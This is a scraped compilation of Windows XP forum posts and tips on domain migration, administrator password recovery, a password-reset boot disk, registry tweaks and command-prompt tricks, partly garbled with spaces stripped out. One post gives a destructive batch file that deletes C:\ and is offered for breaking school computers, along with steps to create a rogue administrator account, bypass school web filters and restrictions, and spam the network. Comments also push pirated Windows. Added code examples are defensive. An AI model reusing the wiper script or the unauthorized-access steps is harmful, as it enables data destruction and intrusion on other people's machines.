
Company I'm working for had/has Server 2003 on a server.

But the motherboard is going out on it and it's OEM software. So I'm trying to build a new network just using XP Pro. We are small and what we are using it for doesn't justify spending 2k to replace server software. The issue I'm having is that whoever set up the network is unreachable and nobody knows the usernames and passwords to log on locally, only to login to the server domain. What resolutions are there so that I can set up new network connections on the computers which were part of the old domain? Only options available once computer boots up is to either connect to domain or connect locally. Obviously if I could connect locally I could reconfigure the network. But without knowing the user and pw there is an issue.

-------------------------------------------------------------------------------------------------------------------

I had to do the same thing last year. The owner didn't want to pay for a new server. So I changed it from a domain network to a peer to peer network with a workgroup. Don't take any machine off the network yet. Login to the domain as administrator from each machine, one at a time. Reset the local administrator password on each machine, by going to the run box and entering compmgmt.msc, press enter. Go to local users and groups, users. Highlight administrator, click action, set password. Use the same password to make it easier. At that point you will have a local administrator account for each machine. Add any domain users to the local machine who may need access at the same time. Copy their favorites, my documents, etc... from the domain account to the local account if necessary. At that point you can remove the machine from the domain and put it on the work group. Just make sure that you copy all the shares from the server to whichever machine you are going to use as a file server before you remove it from the network. Set the permissions.

-------------------------------------------------------------------------------------------------------------------

The administrator password in Windows XP is the password used to access the "Administrator" account.

This account usually doesn't show up on the logon screen and most people don't know it exists. Usually that's okay because you won't need to use your computer under this account very often. However, there are a few times when you will need this password. When you're accessing the Windows XP Recovery Console or you're trying to boot into Windows XP Safe Mode, you'll need this password before you can continue.

Follow the steps below to quickly find the Windows XP Administrator password on your computer:

Difficulty: Average

Time Required: Figuring out the Administrator password may take a few minutes to hours depending on the situation

Here's How:

1. Try leaving the password blank. Just press Enter without typing anything when asked for it. The password to the Windows XP Administrator account is defined during the initial Windows XP installation process and it's often simply left blank.
2. Enter the password to your account. Often times, depending on how Windows XP was set up on your computer and what part of XP is asking for an admin password, the primary user account will also be configured with administrator access.
3. Try to remember your administrator password. If you installed Windows XP on your computer yourself, you probably set the administrator password during the Windows XP installation process. If that's true, you might be able to make really good guesses at what the password might be.
4. Have another user enter his or her password. If there are other users that have accounts on your Windows XP computer, one of them may be set up with administrator access.
5. Recover the administrator password using a Windows password recovery tool. These tools are software programs designed to discover or reset/delete Windows passwords. Note: Some password recovery tools in the list I linked to above also have the ability to transform regular user passwords into administrator passwords. This could be valuable if you know your account's password but it's not an administrator account.

6. Perform a clean installation of Windows XP. This is a last resort option. This type of installation will completely remove Windows XP from your PC and install it again from scratch. If you're just curious about the password to your Administrator account then obviously don't go to this extreme. However, if you're needing the Administrator password to access diagnostic tools and this is your last effort to save your PC, performing a clean install will work.

Tips:

1. Looking for your administrator password but aren't using Windows XP? See How to Find Windows Administrator Passwords for instructions tailored for other Windows operating systems.

I've put together a single floppy or CD / USB Drive which contains things needed to reset the passwords on most systems. The CD can also be installed on a USB drive, see readme.txt on the CD. The bootdisk should support most of the more usual disk controllers, and it should auto-load most of them. Both PS/2 and USB keyboard supported. More or less tested from NT3.5 up to Windows 7, including the server versions like 2003 and 2008. Also 64 bit windows supported.

DANGER WILL ROBINSON! If password is reset on users that have EFS encrypted files, and the system is XP or newer, all encrypted files for that user will be UNREADABLE! and cannot be recovered unless you remember the old password again. If you don't know if you have encrypted files or not, you most likely don't have them. (except maybe on corporate systems)

Please see the Frequently Asked Questions and the version history below before emailing questions to me. Thanks!

Should now be possible to load extra drivers (drivers?.zip) from USB the same way as with floppy. Or maybe not. Did not test it that much. Fixed a lot of bugs in the registry handling, did not affect password reset much, but did affect larger registry edits.

You still may experience hangs when the NTFS disk is mounted, it will hang after saying "NTFS version x.xx" or such. If there is disc activity, just wait, it may take a while.

2007-09-27

Patched up NTFS driver to get rid of hang on mount in many cases (after selecting disk). Got many problem reports on this. At the same time someone on the NTFS-for-linux mailinglist mentioned it, and Anton Altaparmakov made a patch very quick. Thank you Anton! Nice if people experiencing the hang in 2007-09-23 can mail me and tell if the fix worked or not. Thanks! NOTE: It may still take up to a minute or two to select the disk. Floppy version had a script bug making it crash in the first menu. Fixed. CCISS driver (HP/Compaq DLxxx etc) had different device paths. Hacked in support for it, may not be 100% still.

2007-09-23

Floppy version is back! (requires 3 floppies to get all drivers, but you can compose your own driver set so you only need 2) Yes, VISTA is supported (even more) Disk select now indicates which disks are removable, ie are USB keys for instance. Check for "read-only" NTFS mount, you get instructions on what to do if there are problems with the disk so changes won't be saved. Missed out on some IDE/ATA and SATA drivers last time, better now.. I hope. User can be added to the administrator group, making them administrators. Stupid typo in readme.txt on CD fixed, on how to make USB bootable.

(earlier history removed)

9705xx

First public release.

Download

Note: Some links may be offsite.



CD release, see below on how to use


cd110511.zip (~3MB) - Bootable CD image. (md5sum: fe0d30a1c540ec6757e748c7c09e2e4f)
usb110511.zip (~3MB) - Files for USB install (md5sum: 50ced8d2a5febe22199f99acec74e63b)
cd100627.zip (~4MB) - Previous version CD. (md5sum: 6d80cdfbba97457e413f95a3554d9524)

The files inside the USB zip are exactly the same as on the CD. See below for instructions on how to make USB disk bootable.

Floppy release (not updated anymore), see below on how to use them

bd080526.zip (~1.4M) - Bootdisk image (md5sum: 37889e4c540504e59132bdcdfe7f9bb7)
drivers1-080526.zip (~310K) - Disk drivers (mostly PATA/SATA) (md5sum: 72ac1731c6ba735d0ac2746a30dbc3ee)
drivers2-080526.zip (~1.2M) - Disk drivers (mostly SCSI) (md5sum: 30172bec657c85a5f1a0b43601452fb7)
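Checking a download against the md5sum values in the CD and floppy listings above, as an added example (not code from the original page or its author). It parses listing lines in the page's format and hashes the files found in a directory; an MD5 match only shows that the file arrived intact, because the value is published next to the download and MD5 is not collision resistant.

```python
import hashlib
import re
from pathlib import Path

# Listing lines as they appear on the page (file names and MD5 values are the page's own).
PAGE_LISTING = """
cd110511.zip (~3MB) - Bootable CD image. (md5sum: fe0d30a1c540ec6757e748c7c09e2e4f)
usb110511.zip (~3MB) - Files for USB install (md5sum: 50ced8d2a5febe22199f99acec74e63b)
cd100627.zip (~4MB) - Previous version CD. (md5sum: 6d80cdfbba97457e413f95a3554d9524)
bd080526.zip (~1.4M) - Bootdisk image (md5sum: 37889e4c540504e59132bdcdfe7f9bb7)
drivers1-080526.zip (~310K) - Disk drivers (mostly PATA/SATA) (md5sum: 72ac1731c6ba735d0ac2746a30dbc3ee)
drivers2-080526.zip (~1.2M) - Disk drivers (mostly SCSI) (md5sum: 30172bec657c85a5f1a0b43601452fb7)
"""

# "<name>.zip ... (md5sum: <32 hex digits>)" on one line.
ENTRY = re.compile(r"^(?P<name>\S+\.zip)\b.*\(md5sum:\s*(?P<md5>[0-9a-fA-F]{32})\)\s*$")


def parse_listing(text):
    """Turn the page's listing text into {file name: lowercase md5 hex}."""
    manifest = {}
    for line in text.splitlines():
        match = ENTRY.match(line.strip())
        if match:
            manifest[match.group("name")] = match.group("md5").lower()
    return manifest


def md5_of(path, chunk_size=1 << 20):
    """Hash a file in chunks so large images are not read into memory at once."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for block in iter(lambda: handle.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def verify(directory, manifest):
    """Return {file name: 'ok' | 'MISMATCH' | 'missing'} for every manifest entry."""
    results = {}
    for name, expected in manifest.items():
        path = Path(directory) / name
        if not path.is_file():
            results[name] = "missing"
        elif md5_of(path) == expected.lower():
            results[name] = "ok"
        else:
            results[name] = "MISMATCH"
    return results


if __name__ == "__main__":
    # Check whatever has been downloaded into the current directory.
    for name, status in verify(".", parse_listing(PAGE_LISTING)).items():
        print(f"{status:9} {name}")
```

A file reported as MISMATCH should be downloaded again and not written to a CD, USB drive or floppy.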

Previous versions may sometimes be found here (also my site)

NOTE: Versions before 0704xx will corrupt the disk on VISTA!

NOTE THAT THE BOOTDISK CONTAINS CRYPTOGRAPHIC CODE, and that it may be ILLEGAL to RE-EXPORT it from your country.

How to make the CD

Unzipped, there should be an ISO image file (cd??????.iso). This can be burned to CD using whatever burner program you like, most support writing ISO-images. Often double-clicking on it in explorer will pop up the program offering to write the image to CD. Once written the CD should only contain some files like "initrd.gz", "vmlinuz" and some others. If it contains the image file "cd??????.iso" you didn't burn the image but instead added the file to a CD. I cannot help with this, please consult your CD-software manual or friends.

The CD will boot with most BIOSes, see your manual on how to set it to boot from CD. Some will auto-boot when a CD is in the drive, some others will show a bootmenu when you press ESC or F10/F12 when it probes the disks, some may need to have the boot order adjusted in setup.

How to make a bootable USB drive

Copy all the files that are inside the usbXXXXXX.zip or on the CD onto a USB drive, directly on the drive, not inside any directory/folder.

It is OK if there are other files on the USB drive from before, they will not be removed.

Install bootloader on the USB drive, from command prompt in windows (start the command line with "run as administrator" if possible):

X:syslinux.exe -ma X:

Replace X: with the drive letter the USB drive shows up as (DO NOT USE C:)

If it seems like nothing happened, it is usually done. However, a file named ldlinux.sys may appear on the USB drive, that is normal.

It should now in theory be bootable. Please know that getting some computers to boot from USB is worse than from CD, you may have to change settings, or some will simply not work at all.

How to make the floppy

The unzipped image (bdxxxxxx.bin) is a block-to-block representation of the actual floppy, and the file cannot simply be copied to the floppy. Special tools must be used to write it block by block.

Unzip the bd zip file to a folder of your choice. There should be 3 files: bdxxxxxx.bin (the floppy image) and rawrite2.exe (the image writing program), and install.bat which uses rawrite2 to write the .bin file to floppy. Insert a floppy in drive A: NOTE: It will lose all previous data! Run (doubleclick) install.bat and follow the on-screen instructions. Thanks to Christopher Geoghegan for the install.bat file (some of it ripped from memtest86 however)

Or from unix:

dd if=bd??????.bin of=/dev/fd0 bs=18k

How to make and use the drivers floppy

Simply copy the zip file onto an empty floppy. You MUST NOT UNZIP THE ZIP FILE!

Depending on your hardware you may only need one of the driver sets or the other, or maybe both.

To use, insert one of the driver floppies when asked for it after booting, the zip file will be unzipped to memory. If no drivers matched (no harddisk found), you can select 'f' from the main menu to load the other driver set. Then select 'd' to auto-start the new drivers (if it matches your hardware). Sometimes it fails detecting the floppy change and you get an error, just select 'f' again, it works the second time.

For more advanced users that use this often, it is possible to unzip just the drivers you need and zip them up into a new zip archive. The zip file name must start with "drivers", the rest is ignored. (it unzips drivers*.zip)

Regedit Uses: For All USB Port Disable

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBSTOR

(Double click in the USBSTOR, one list will open in the right side; on that list double click the Start and change the value to 4 (disable). 3 is enable.)

you can "hack" all of the following with Command Prompt: Most Websites, User Accounts (on your computer), Computer Settings, Email, and some other stuff.

To do anything related to hacking with Command Prompt you must know my best friend and his name is IP! IP is everything in the cyber world, it identifies you like no other, with your IP someone can find out where you live, who the computers registered to, the computers name, and more! So think of it as your cyber Social Security Number (SSN) you don't want to just tell everyone it.

So to get your IP you can start by opening Command Prompt. Next make sure it is on C: Drive. Then type in the following: ipconfig /all

This will display a lot of info some of which is very important. This will tell you how you are connected to the internet and with what and also a lot of other stuff (i will not lie some of the info it gives is useless). Congrats you learn a command! and you have now found out your IP! (im not telling where it is im just saying its there if you scroll up a little bit)

Now to find internet connection! Lets say you and a friend are playing a MMO and your friend is host and you are lagging well if you want to find out why just type into command prompt the following: Ping 127.0.0.1 (replace 127.0.0.1 with your friends IP) (also 127.0.0.1 is localhost or you and is used for offline "things") (it also means nothing towards your IP basicly) the lower the number you see the better! lower means faster and higher means slower

Now time for some "Advanced" stuff. How to find out computer account passwords! this will require you to know the username. First open Command Prompt. Then type in the following: Net User. This will give you all the accounts (so i lied you didn't need to know the Usernames xD). Now type in Net User Admin (you may replace Admin with the account name). Now you get even more info on that account if you read it all it tells you about the password. Now if you want to change the password just type the following: Net User Admin Password (you can replace Admin with the username and Password with the desired password) and TADA you have changed the account password.

O.K. that is all that i will currently say, i will post more in the future, this is just a taste of things to come and now for some fun with Command Prompt!

OpenupNotepad.exeorinCommandPrompttypeNotepad(youmaytype inafilesnamewithoutthe.exeontheendanditwillrunit) Nowtypeinthefollowing: start start start start start start startcrash thenclickSaveasandselectallfiles,thennameis.batandwhenyouare boardjustrunitandu'llseewhatitdoes(makesureyousavewhatyour doingfirst!)itwillautonametoCrash.bat O.K.itakeNORESPONSIBILITYFORWHATIAMABOUTTOPOST!thisfile willBREAKYOUCOMPUTER! @echooff taskkillfexplorer.exe start%windir%\System32\rundll32.exeuser32.dll,LockWorkStation rdc:\/s/q cls putthatintoanotepadandnameitBreak.batnowwhatwillthisdo?itwill firstdeleteallinternetbrowsers!thenitwilllockyououtofyourcomputer andthendeleteyourSystem32filewhichiswhatyourcomputerneedsto RUN!nowDONOTUSETHIS!ionlypostedthisforthosehowwanttobreak aschoolcomputer!becarefulwiththisbecauseyouwillneedtogetanew computersincerestoringcan'tfixthis!nowbesafeandhavefunwiththe newskillsihavejusttaughtyou!don'tforgettothanksandrepme! OpencommandpromptfromwhereitisBannedornotallowedbyadmin (awesometricks)

OpenupCommandPrompt(Start>Run>Command.com) Can'tusecommandpromptatyourschool? OpenupMicrosoftword..Type: Command.com ThensaveitasSomthing.bat. Warning:Makesureyoudeletethefilebecauseiftheadminfindsoutyourin bigtrouble. Addingausertoyournetwork Type: NetuserHaxxor/ADD Thatwilladd"Haxxor"ontotheschoolusersystem. Nowyouaddedusersletsdeletethem! Type:NetuserHaxxor/DELETE Warning:Becarefullitdeletesalltheirfiles. "Haxxor"willbedeletedfromtheusersystem.

Hmmm?Itsaysaccessdenied? Thatsbecauseyournotadmin! NowletsmakeyourAdmin! ThiswillmakeHaxxoranadmin.Rememberthatsomeschoolsmaynotcall theiradmins'adminstrator'andsoyouneedtofindoutthenameofthelocal grouptheybelongto. Type:netlocalgroup Itwillshowyouwhattheycalladmin,sayatmyschooltheycalllit adminstratorsotheniwould Type:netlocalgroupadministratorHaxxor/ADD Gettingpastyourwebfilter. Easyway:Typewhateveryouwanttogoonsayiwantedtogoonminiclipsbug onwireiwouldgotogoogleandsearchminiclipbugonwire theninsteadofclickingthelinkiwouldclick"cached". Hardway:I'mhopingyoustillhavecommandpromptopen. Type:pingminiclip.com AndthenyoushouldgetaIPtypethatoutinyourwebbrowser,anddon't

forgettoput"http://"beforeyoutypetheIP. Sendingmessagesthroughyourschoolserver Okay,here'showtosendcrazymessagestoeveryoneinyourschoolona computer.Inyourcommandprompt,type NetSend<domain>*"Theserverish4x0r3d" Note:<domain>maynotbenecessary,dependingonhowmanyyourschoolhas accesstoo.Ifit'sjustone,youcanleaveitout. Where<domain>is,replaceitwiththedomainnameofyourschool.For instance,whenyoulogontothenetwork,youshouldhaveachoiceofwhereto logon,eithertoyourschool,ortojustthelocalmachine.Ittendstobecalled thesameasyourschool,orsomethinglikeit.So,atmyschool,Iuse NetSendHaxxorSchool*"Theserverish4x0r3d" Theasteriskdenoteswildcardsending,orsendingtoeverycomputerinthe domain.Youcanswapthisforpeople'saccounts,forexample NetSendVarndeandan,jimmy,admin"Theserverish4x0r3d" usecommastodividethenamesandNOSPACESbetweenthem. whatsay?? ~Cheers~ or
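From the defender's side, the net user, net localgroup and net send invocations in the post above are easy to spot wherever process command lines are collected. This added example (not part of the original post) scans constructed log records for them and pairs an account creation with a later group add; the tab-separated record format, host names and account names are assumptions.

```python
import re

# Constructed process-creation records: time, host, logged-on account, command line.
SAMPLE_LOG = """\
2024-03-04T09:12:01\tLAB-PC07\tstudent14\tnet user
2024-03-04T09:12:40\tLAB-PC07\tstudent14\tnet user Haxxor /ADD
2024-03-04T09:13:05\tLAB-PC07\tstudent14\tnet localgroup administrators Haxxor /ADD
2024-03-04T09:14:22\tLAB-PC07\tstudent14\tnet user Admin Password
2024-03-04T09:15:10\tLAB-PC07\tstudent14\tNet Send HaxxorSchool * "The server is h4x0r3d"
2024-03-04T09:16:00\tLAB-PC07\tstudent14\tnet user Haxxor /DELETE
2024-03-04T09:20:00\tLAB-PC09\tteacher02\tipconfig /all
"""

NET = r"^\s*net1?(?:\.exe)?\s+"   # net.exe hands most of its work to net1.exe
NAME = r"[^\s/]\S*"               # an argument that is not a /switch
RULES = [
    ("account-created",
     re.compile(NET + r"user\s+(?P<user>" + NAME + r")(?:\s+" + NAME + r")?\s+/add\b", re.I)),
    ("account-deleted",
     re.compile(NET + r"user\s+(?P<user>" + NAME + r")\s+/delete\b", re.I)),
    ("group-member-added",
     re.compile(NET + r"localgroup\s+(?P<group>\S+)\s+(?P<user>" + NAME + r")\s+/add\b", re.I)),
    ("password-set",
     re.compile(NET + r"user\s+(?P<user>" + NAME + r")\s+(?P<secret>" + NAME + r")\s*$", re.I)),
    ("broadcast-message",
     re.compile(NET + r"send\s+(?:\S+\s+)?\*\s+(?P<text>.+)$", re.I)),
]


def scan(log_text):
    """Return one finding per record whose command line matches a rule (first rule wins)."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split("\t", 3)
        if len(parts) != 4:
            continue  # skip malformed records
        when, host, account, command = parts
        for rule, pattern in RULES:
            match = pattern.match(command)
            if not match:
                continue
            detail = {k: v for k, v in match.groupdict().items() if v is not None}
            if "secret" in detail:
                detail["secret"] = "<redacted>"  # never copy a password into an alert
            findings.append({"time": when, "host": host, "by": account, "rule": rule, **detail})
            break
    return findings


def escalations(findings):
    """Pair an account creation with a later local-group add of the same account on the same host."""
    created, hits = {}, []
    for finding in findings:
        key = (finding["host"], finding.get("user", "").lower())
        if finding["rule"] == "account-created":
            created[key] = finding["time"]
        elif finding["rule"] == "group-member-added" and key in created:
            hits.append((finding["host"], finding["user"], created[key], finding["time"]))
    return hits


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for item in results:
        print(item)
    print("escalations:", escalations(results))
```

The group rule matches any local group name because, as the post notes, the administrative group is not always called Administrators.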

Allowing dos and regedit in a restricted Windows

A very simple tactic I found after accidentally locking myself out of dos and regedit is to open notepad and type the following:

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"Disabled"=dword:0

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:0

Save it as something.reg then run it. Simple.

NETWORKING HACK

Chat With Command Prompt

Talk with other computers on your network. If you want a private chat with a friend or client on your Network, you don't need to download any fancy program! All you need is your friend's IP address and Command Prompt. Firstly, open Notepad and enter:

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see: MESSENGER User: After "User" type the IP address of the computer you want to contact. After this, you should see this: Message: Now type in the message you wish to send. Before you press "Enter" it should look like this: MESSENGER User: 56.108.104.107 Message: Hi Now all you need to do is press "Enter", and start chatting!

How to start System Restore by using the Command prompt

Note: You must be logged on to Windows with a user account that is a computer administrator to complete these steps. To verify that you are logged on to Windows with a user account that is a computer administrator, visit the following Microsoft Web site:

If a new program has made your computer behave unpredictably, and uninstalling the new program did not help, you can try the Windows XP System Restore tool.

Important: If you have not previously set a restore point in System Restore, you cannot restore your computer to a previous state. If you are not sure, or if you have not previously set a restore point, contact Support.

To start System Restore using the Command prompt, follow these steps:

1. Restart your computer, and then press and hold F8 during the initial startup to start your computer in safe mode with a Command prompt.
2. Use the arrow keys to select the Safe mode with a Command prompt option.
3. If you are prompted to select an operating system, use the arrow keys to select the appropriate operating system for your computer, and then press ENTER.
4. Log on as an administrator or with an account that has administrator credentials.
5. At the command prompt, type %systemroot%\system32\restore\rstrui.exe, and then press ENTER.
6. Follow the instructions that appear on the screen to restore your computer to a functional state.

Note: To start the System Restore tool using another safe mode option, visit the Microsoft Help and Support Web site and see the article "A description of the Safe Mode Boot options in Windows XP." For additional information about the Safe mode with a command prompt, click the following article number to view the article in the Microsoft Knowledge Base:

315222 A description of the Safe mode boot options in Windows XP

Finding the IP Address for another Computer in Windows XP/Vista/7

Notes:

Important: You must know the full computer name of the computer for which you want to find the IP address.

If the computer for which you are trying to find the IP address uses a DHCP connection, keep in mind that the IP address will change on a regular basis.

To find another computer's IP address:

1. Connect to the Internet.
2. Click the Start button.
3. Start the Run utility.
   o In Windows XP, select Run.
   o In Windows Vista/7:
     1. Select All Programs.
     2. Select Accessories.
     3. Select Run.
4. In the Open: text box, type: cmd
5. Click OK.
6. Ping the computer for which you want to find the IP address.
   In XP, at the command prompt, type: ping [Full Computer Name]
   Note: Replace [Full Computer Name] with the full name of the computer.
   In Vista/7, at the command prompt, type: ping -4 [Full Computer Name]
   Note: Replace [Full Computer Name] with the full name of the computer.
7. Press the Enter key.
8. Locate the IP address in the results of your ping session.
9. Close the command prompt window.

There is a hidden administrator account. You can log on it and you can change or remove all the other passes of your comp without knowing the previous passes. Just type ctrl alt del twice and then type Administrator on the account name and you can enter. If that won't work, restart the computer and toggle the F5 button. You will get screen that will ask you if you want to boot with command prompt, choose it and then type net user, then press enter

# Then again type "Net user [Username of the Account] *" then press Enter, without the ["], and quotes. Make sure you spell the username correctly, and you have the '*'

# To change password press enter and after that tielersouth* Reset password to whatever you want.

If that won't work, go to this link.. more suggested info on the replies

LITTLECOMPNERD May 19, 2009 4:08pm BST
press f8 then select start safe mode command prompt

Edrick Oct 24, 2009 8:40am BST
hi can you help me i want to use my bro. comp but i dont know his pass how can i know it without changing anything or resting it pls help me

ARK May 26, 2011 1:21pm BST

Edrick, thats easy just follow these steps, 1. ask your bro the pass 2. enter in the pass 3. Voila!! YOU ARE ON!!

There are 3 real ways to bypass any stuck passwords on any XP computer.

1. Use the build in machine administrator, if it's unlocked. Seeing that administrator's can change the passwords of administrators, access to any local administrative account will yield an entry to the user account control panel applet. To see if your built in admin account is unlocked, you will need to start the computer normally. When it finishes loading, you will have one of two screens: The welcome screen, or the Windows Logon screen. If you have a welcome screen (Windows XP Home default) you will need to press CTRL ALT DEL simultaneously, and then again. CTRL+ALT+DEL release CTRL+ALT+DEL release. The welcome screen should change to the advanced login screen, that you may already have if you have turned off the welcome screen, or if you are using XP pro, or Windows Server 2003. Next, for username type in Administrator, leave the password blank. If you can get in with this account, or any administrator account, click on start and click run. Type "Control UserPasswords2". From here, adjust the passwords of each account on the computer as you see fit.

2. Next, let's say you can't get into any administrative account, or perhaps windows are not loading all the way because your product key has expired. You will NOT be able to access command prompt in safe mode to change administrative accounts unless you can actually log onto the computer, so if windows is locked because of product key issues, don't try this. But if you can still get into a user account that is not an admin, and you need to unlock an admin, the login as the normal user and create a new account using command prompt (as a limited user you cannot do this via the control panel) and type

net user Admin2 password1 /create

This creates an account named Admin2 with a password of password1. next see if you can make this account an admin. type

net localgroup Administrators Admin2 /add

if you get an access denied message, you will need to go to step 3. If you get a command completed successfully, the logout and go to the normal login screen. Then login as Admin2 with the new account, and you now have admin control of the pc. Go to step 1.

3. If you cannot get into windows as any account or using command prompt in safe mode or if windows is locked with a bad product key, you can use third party software to adjust the Admin Password, or to adjust the Microsoft oobe activation client, so that you can regain access. My suggestions would be to use Linux boot disc, (which you can put on a CD, floppy, or flash drive) and as long as BIOS is configured to accept a boot order with one of these devices before the hard drive, then you are good to go. If not, you will have to go into BIOS to change it. Type F1 or F2 at startup to gain access to BIOS. If there is a BIOS password, and you don't know it, you will have to reset BIOS using the reset jumper on the inside of the motherboard. Look that up on Google for more information.

4. If all else fails, and you cannot get in, you will have to settle for reformatting. This will clear all user data and files previously on the computer though, so save whatever you can beforehand. Then, on another computer, download a copy of an installation disc for Torrents or piratebay and burn the ISO to a disc using IMGBurn or Nero, or any of those other hokey ISO burning programs. Then, place the disc in the computer you want to reformat. When it says "Press any key to boot from disc" (during the normal boot) press a key, and wait for the OS to load the WINDOWS Setup Menu. Follow the on screen instructions to reformat the hard drive and reinstall windows. If it asks you for the current admin password you are doing something wrong. Make sure you are not trying to repair windows, or install windows onto the already made partition. This will ask for a password. You need to press D to delete the partition. Delete all partions on the drive. L to confirm the delete. Then once your disc is empty, press enter to reinstall windows and reformat, etc. Follow the directions on the screen. If you are using a cracked version of Windows, you will not need a product key. If you are using a normal disc, and you have a product key that works (usually on the side of the OEM machine, or on a label on the software package for ordered products) then type that in if it asks for it during setup, or after setup on the first logon when MSOobe (the activator) starts.

Any questions, or if you'd like me to outline specific instructions for you in a specific scenario, email me privately at zgwin(at)zigweb(dot)net.

~Zach
Microsoft MVP
Software Architect

drew Jul 23, 2009 6:37am BST
Zach, first off i read some of the stuf u wrote on a forum and figured u knew what you were talking about, so i thought u might be able to help. i have a virus on my computer that has allowed someone to hack into it and change my login password on windows xp home edition. iv tried everything i can to get into it, iv gone through bios, iv tried F2, 5, 8, 10 and 12, and iv got nothing. i dont really have a way to get any type of password cracking softwear onto a cd or anything, i was wondering if you could tell me maybe how to hack my own computer to bypass the login screen. oh and another thing too that i thought was weird, when i tried to boot from a disk it said that it couldn't... i dont know y it would say that when i have a cd and a dvd drive

and they both work. but yea thats where im at. maybe u can shed a little light on that for me. thanks. Drew

frustrated Sep 14, 2009 3:36am BST
I have a legal version of Windows XP Pro, with disks and product key and all that. I even have access to a user account with administrative rights. My problem is the hidden Administrator account (that I can only see when booting in Safe Mode) has a password on it, and I can't remember what it is. I need it because I want to reset my MBR, and the only way I've found to do that is to boot from the installation CD and go into recovery mode and run firmer. To get into recovery mode, I need the password to this Administrator account. Do you know of a way to reset this password or get around this problem somehow?? Thanks a ton for any help.

awmking Oct 25, 2009 5:33am GMT
Could you please help me too? Will this info work for windows vista hp? I cannot seem to recover my admin pass.. please help... thanks in advance

dzbunni Oct 9, 2009 12:19am BST
THIS EASY METHOD JUST WORKED FOR ME, I BYPASSED THE PASSWORD BY DELEATING IT, THEN CREATED NEW ONE, SYSTEM WORKING GREAT, NO ADVERSE GLITCHES!

I have a dell laptop, forgot the password I created, and i am the main account holder. my computer guy I assume has created an administrator password, but when I contacted him about this issue, i was told there would be a $50 fee to reset the password, so i came to this forum and tried every method listed here! Of course, it wasnt until I got to the last few postings that i found one that worked! This method just worked completely for me, I am now operating windows in normal mode and happy to of impressed myself, loll! I decided to post this method in PLAIN ENGLISH, for those of us less computer savy.

1. when windows is starting up press F8 (I had to attempt this a few times till i got it right, when I continuously hit the F8 key as fast as i could it worked, but you must begin hitting it as soon as windows begins to load)
2. (This will take you into a screen where windows list different settings you can choose, as to how you want windows to run. I used the arrow keys on my keyboard, and selected safe mode) select SAFE MODE
3. (for username, type the word) administrator
4. (no password should be needed, so then press) enter
5. (windows should then load in safe mode. access the control panel by doing the following); click start, control panel, user accounts
6. Once in user accounts, find the name of the account that you need the password for, and click on that account, then click on the option to remove the password for that account. THAT ACCOUNT IS NOW PASSWORD FREE!!!!
7. Restart windows in normal mode and login!

I also then managed to create (recreate) a password for that account as well, and then i created a guest account too!

Hiding the C Drive

From the Run command, open regedit and go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer. As soon as you click Explorer, its values appear in the pane on the right. Right-click in a blank area there and choose New -> DWORD Value; a new value is created. (Name this new value NoDrives.) Then, in the DWORD value box, enter 4 if you want to hide the C drive. Then select Decimal and click OK. After that, restart. If you look now, the C drive will be hidden.
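The number entered for NoDrives is a bitmask with one bit per drive letter (A is bit 0, Z is bit 25), and the setting only removes the drive icons from Explorer views; it is not an access control. This added example (not from the original page) builds the mask for a set of letters and decodes a value found in a registry export during an audit; the sample export text is constructed.

```python
import re
import string

LETTERS = string.ascii_uppercase  # A..Z map to bits 0..25


def nodrives_mask(letters):
    """Return the NoDrives DWORD that hides the given drive letters, e.g. "CD" or ["c:", "D"]."""
    mask = 0
    for item in letters:
        letter = item.strip().rstrip(":").upper()
        if len(letter) != 1 or letter not in LETTERS:
            raise ValueError(f"not a drive letter: {item!r}")
        mask |= 1 << LETTERS.index(letter)
    return mask


def hidden_drives(mask):
    """Decode a NoDrives value into the list of drive letters it hides."""
    if mask < 0:
        raise ValueError("NoDrives is an unsigned DWORD")
    return [LETTERS[bit] for bit in range(26) if (mask >> bit) & 1]


# .reg exports store DWORDs in hexadecimal, unlike the decimal value typed into regedit.
NODRIVES_LINE = re.compile(r'^"NoDrives"=dword:([0-9a-f]{1,8})\s*$', re.I | re.M)


def audit_reg_export(text):
    """Return the drive letters hidden by a NoDrives value in exported .reg text (empty if absent)."""
    match = NODRIVES_LINE.search(text)
    return hidden_drives(int(match.group(1), 16)) if match else []


# Constructed sample of what an export of the Explorer policy key looks like.
SAMPLE_EXPORT = r"""REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDrives"=dword:00000004
"""

if __name__ == "__main__":
    print("C only      ->", nodrives_mask("C"))
    print("C and D     ->", nodrives_mask("CD"))
    print("all drives  ->", nodrives_mask(LETTERS))
    print("export hides:", audit_reg_export(SAMPLE_EXPORT))
```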

A:1, B:2, C:4, D:8, E:16, F:32, G:64 ,H:128, I:256, J:512, K:1024, Z:33554432 Command Lines: ADDUSERS ADmodcmd ARP ASSOC ASSOCIAT ATTRIB b BCDBOOT Create or repair a system partition BOOTCFG Edit Windows boot settings BROWSTAT Get domain, browser and PDC info c CACLS CALL CD Folder CHANGE CHKDSK CHKNTFS CHOICE CIPHER CleanMgr bin CLEARMEM Change file permissions Call one batch program from another Change Directory - move to a specific Change Terminal Server Session properties Check Disk - check and repair disk problems Check the NTFS file system Accept keyboard input to a batch file Encrypt or Decrypt files/folders Automated cleanup of Temp files, recycle Clear memory leaks
22

Add or list users to/from a CSV file Active Directory Bulk Modify Address Resolution Protocol Change file extension associations One step file association Change file attributes

